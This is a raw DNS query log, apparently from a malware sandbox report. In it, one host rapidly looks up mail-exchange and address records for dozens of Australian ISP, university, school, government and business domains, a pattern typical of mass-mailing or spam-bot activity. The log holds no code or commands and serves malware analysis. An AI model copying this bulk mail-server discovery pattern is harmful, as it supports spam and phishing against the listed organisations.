                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.942101955 CET192.168.2.38.8.8.80xd6a0Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.966976881 CET192.168.2.38.8.8.80x9f14Standard query (0)filter2.microm-1.mailguard.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.986982107 CET192.168.2.38.8.8.80xf38fStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.007744074 CET192.168.2.38.8.8.80x8391Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.054685116 CET192.168.2.38.8.8.80x28abStandard query (0)tafensw.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.166188002 CET192.168.2.38.8.8.80x4cc1Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.187494040 CET192.168.2.38.8.8.80x95d9Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.221648932 CET192.168.2.38.8.8.80x2838Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.244645119 CET192.168.2.38.8.8.80x5703Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.341695070 CET192.168.2.38.8.8.80xe0f6Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.366678953 CET192.168.2.38.8.8.80x5187Standard query (0)icare.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.367708921 CET192.168.2.38.8.8.80xf617Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.453732967 CET192.168.2.38.8.8.80x538fStandard query (0)smh.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.499577999 CET192.168.2.38.8.8.80x2f9fStandard query (0)icarehealth-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.518651962 CET192.168.2.38.8.8.80x49f1Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.540654898 CET192.168.2.38.8.8.80x443cStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.602226019 CET192.168.2.38.8.8.80x978aStandard query (0)three.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.622638941 CET192.168.2.38.8.8.80x6e24Standard query (0)smtpin2.three.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.669157982 CET192.168.2.38.8.8.80xd7eaStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.692823887 CET192.168.2.38.8.8.80x5c1Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.774779081 CET192.168.2.38.8.8.80x3157Standard query (0)dialm.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.779071093 CET192.168.2.38.8.8.80x2414Standard query (0)tafensw-net-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.876364946 CET192.168.2.38.8.8.80x6b2eStandard query (0)ep.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.930345058 CET192.168.2.38.8.8.80x6d5aStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:14.951502085 CET192.168.2.38.8.8.80x5fd0Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.067405939 CET192.168.2.38.8.8.80x1523Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.102029085 CET192.168.2.38.8.8.80xef7eStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.158991098 CET192.168.2.38.8.8.80xd7b4Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.179373026 CET192.168.2.38.8.8.80xb3aStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.258681059 CET192.168.2.38.8.8.80x1413Standard query (0)adam.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.365384102 CET192.168.2.38.8.8.80xf43cStandard query (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.459239006 CET192.168.2.38.8.8.80xfa01Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.479871035 CET192.168.2.38.8.8.80xfcc1Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.548666000 CET192.168.2.38.8.8.80x64b7Standard query (0)cgd.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.610780954 CET192.168.2.38.8.8.80xc71eStandard query (0)mxa-0070f401.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.612078905 CET192.168.2.38.8.8.80xc435Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.658653975 CET192.168.2.38.8.8.80x933dStandard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.682090044 CET192.168.2.38.8.8.80x8b1cStandard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.768409014 CET192.168.2.38.8.8.80x716eStandard query (0)jaze.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.806313992 CET192.168.2.38.8.8.80x3d5Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.866712093 CET192.168.2.38.8.8.80xeb90Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.885174990 CET192.168.2.38.8.8.80xa086Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:15.994779110 CET192.168.2.38.8.8.80x5b9bStandard query (0)stjohnbosco.adl.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.099065065 CET192.168.2.38.8.8.80x6b7aStandard query (0)stmaryscoll.adl.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.203959942 CET192.168.2.38.8.8.80x6736Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.222676992 CET192.168.2.38.8.8.80x12cbStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.304231882 CET192.168.2.38.8.8.80xd747Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.323358059 CET192.168.2.38.8.8.80x7b97Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.360357046 CET192.168.2.38.8.8.80x5a93Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.379367113 CET192.168.2.38.8.8.80xd057Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.444852114 CET192.168.2.38.8.8.80x70c6Standard query (0)fatimarosebud.catholic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.540469885 CET192.168.2.38.8.8.80xacc0Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.570916891 CET192.168.2.38.8.8.80xe1b7Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.633954048 CET192.168.2.38.8.8.80xe75dStandard query (0)student.bond.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.659636021 CET192.168.2.38.8.8.80xdc5fStandard query (0)mx1.bond.c3s2.iphmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.713112116 CET192.168.2.38.8.8.80xd4eStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.743887901 CET192.168.2.38.8.8.80xc281Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.749916077 CET192.168.2.38.8.8.80xbb32Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.770783901 CET192.168.2.38.8.8.80xf304Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.827239990 CET192.168.2.38.8.8.80xab60Standard query (0)aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.828841925 CET192.168.2.38.8.8.80x6161Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.851111889 CET192.168.2.38.8.8.80x88f5Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.876494884 CET192.168.2.38.8.8.80x44f4Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.901712894 CET192.168.2.38.8.8.80x8db8Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.971935034 CET192.168.2.38.8.8.80x12c3Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:16.992383003 CET192.168.2.38.8.8.80x2fd8Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.056377888 CET192.168.2.38.8.8.80xa66eStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.082170963 CET192.168.2.38.8.8.80x656fStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.143978119 CET192.168.2.38.8.8.80x2e2cStandard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.173041105 CET192.168.2.38.8.8.80x6d60Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.319088936 CET192.168.2.38.8.8.80x6e16Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.343255043 CET192.168.2.38.8.8.80xa9f3Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.384242058 CET192.168.2.38.8.8.80xc9d3Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.421027899 CET192.168.2.38.8.8.80x8703Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.506450891 CET192.168.2.38.8.8.80x9d78Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.530693054 CET192.168.2.38.8.8.80x5cafStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.578622103 CET192.168.2.38.8.8.80x38b6Standard query (0)mlc.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.600320101 CET192.168.2.38.8.8.80xef0cStandard query (0)d100282a.ess.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.642422915 CET192.168.2.38.8.8.80xd662Standard query (0)uqconnect.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.740483046 CET192.168.2.38.8.8.80xdce7Standard query (0)melbourneestateagents.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.834548950 CET192.168.2.38.8.8.80xe453Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.854187012 CET192.168.2.38.8.8.80xf6c2Standard query (0)mail.h-email.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.856236935 CET192.168.2.38.8.8.80x9e81Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.885318041 CET192.168.2.38.8.8.80x547fStandard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.911801100 CET192.168.2.38.8.8.80xf17bStandard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.952042103 CET192.168.2.38.8.8.80x7924Standard query (0)uqconnect-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.971884012 CET192.168.2.38.8.8.80xb285Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:17.997589111 CET192.168.2.38.8.8.80xcd6Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.080801010 CET192.168.2.38.8.8.80x99c8Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.104928970 CET192.168.2.38.8.8.80xae7dStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.134493113 CET192.168.2.38.8.8.80x3df3Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.168157101 CET192.168.2.38.8.8.80x8bffStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.228228092 CET192.168.2.38.8.8.80x3ce3Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.249681950 CET192.168.2.38.8.8.80xc17cStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.319598913 CET192.168.2.38.8.8.80x3b06Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.339044094 CET192.168.2.38.8.8.80xba86Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.442589998 CET192.168.2.38.8.8.80x523dStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.471429110 CET192.168.2.38.8.8.80x835aStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.538999081 CET192.168.2.38.8.8.80x6af6Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.560379982 CET192.168.2.38.8.8.80x2ae2Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.611243963 CET192.168.2.38.8.8.80xe2bStandard query (0)postgrads.unisa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.706787109 CET192.168.2.38.8.8.80x3ce5Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.728785038 CET192.168.2.38.8.8.80x1879Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.770365000 CET192.168.2.38.8.8.80x2676Standard query (0)killester.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.868956089 CET192.168.2.38.8.8.80x981eStandard query (0)acsmail.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.955291986 CET192.168.2.38.8.8.80x6caStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:18.980323076 CET192.168.2.38.8.8.80x5e52Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.044572115 CET192.168.2.38.8.8.80x3d3eStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.063709974 CET192.168.2.38.8.8.80x2b6fStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.067388058 CET192.168.2.38.8.8.80xe1d9Standard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.153326035 CET192.168.2.38.8.8.80x1471Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.153326035 CET192.168.2.38.8.8.80x7128Standard query (0)ASPMX.L.GOOGLE.COMA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.172066927 CET192.168.2.38.8.8.80xbe28Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.226314068 CET192.168.2.38.8.8.80x1101Standard query (0)chem.mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.304311991 CET192.168.2.38.8.8.80xfc5fStandard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.323000908 CET192.168.2.38.8.8.80x8963Standard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.413717985 CET192.168.2.38.8.8.80x8d21Standard query (0)student.bond.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.435617924 CET192.168.2.38.8.8.80xecbaStandard query (0)mx1.bond.c3s2.iphmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.480993986 CET192.168.2.38.8.8.80xca65Standard query (0)optus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.509152889 CET192.168.2.38.8.8.80x4b05Standard query (0)mx.emea.email.fireeyecloud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.531651020 CET192.168.2.38.8.8.80x99f1Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.584573030 CET192.168.2.38.8.8.80xe143Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.606185913 CET192.168.2.38.8.8.80xa1c5Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.668629885 CET192.168.2.38.8.8.80xf7f4Standard query (0)netconnect.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.743823051 CET192.168.2.38.8.8.80x7d06Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.768292904 CET192.168.2.38.8.8.80xd589Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.832015038 CET192.168.2.38.8.8.80x4523Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:19.856957912 CET192.168.2.38.8.8.80x4317Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.021624088 CET192.168.2.38.8.8.80xa917Standard query (0)onqhr.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.054586887 CET192.168.2.38.8.8.80x73d6Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.070764065 CET192.168.2.38.8.8.80xe7a8Standard query (0)student.uq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.142797947 CET192.168.2.38.8.8.80xc8b3Standard query (0)edumail.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.162296057 CET192.168.2.38.8.8.80xcff2Standard query (0)edumail-vic-gov-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.219007015 CET192.168.2.38.8.8.80x5d77Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.239732027 CET192.168.2.38.8.8.80xdd2Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.270381927 CET192.168.2.38.8.8.80x1483Standard query (0)student.uts.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.314042091 CET192.168.2.38.8.8.80xc884Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.336987019 CET192.168.2.38.8.8.80xe77bStandard query (0)datafast.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.394742966 CET192.168.2.38.8.8.80xeb1aStandard query (0)student-uq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.529959917 CET192.168.2.38.8.8.80x6141Standard query (0)onqhr-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.560281038 CET192.168.2.38.8.8.80x2b92Standard query (0)aviva.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.649504900 CET192.168.2.38.8.8.80xcfb2Standard query (0)af.aurecongroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.726475954 CET192.168.2.38.8.8.80x3713Standard query (0)student.kings.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.790616989 CET192.168.2.38.8.8.80xeb02Standard query (0)yhoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.820672989 CET192.168.2.38.8.8.80x9b09Standard query (0)park-mx.above.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.834333897 CET192.168.2.38.8.8.80x26d0Standard query (0)mx1.eftel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.908830881 CET192.168.2.38.8.8.80xd13bStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:20.928983927 CET192.168.2.38.8.8.80xea93Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.015038967 CET192.168.2.38.8.8.80xe15fStandard query (0)hospitalityinns.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.067286968 CET192.168.2.38.8.8.80x948fStandard query (0)hospitalityinns-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.129913092 CET192.168.2.38.8.8.80xc184Standard query (0)autumnthreads.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.227518082 CET192.168.2.38.8.8.80xc75eStandard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.248038054 CET192.168.2.38.8.8.80x87caStandard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.307164907 CET192.168.2.38.8.8.80x8defStandard query (0)petalproductions.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.342097998 CET192.168.2.38.8.8.80xe8edStandard query (0)mx2.email-hosting.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.381942987 CET192.168.2.38.8.8.80x8390Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.403481007 CET192.168.2.38.8.8.80x1ea5Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.449188948 CET192.168.2.38.8.8.80xed44Standard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.522308111 CET192.168.2.38.8.8.80x5cdaStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.554328918 CET192.168.2.38.8.8.80x93bdStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.580549002 CET192.168.2.38.8.8.80x2fc1Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.602935076 CET192.168.2.38.8.8.80x379fStandard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.666395903 CET192.168.2.38.8.8.80xca2Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.686641932 CET192.168.2.38.8.8.80xcd30Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
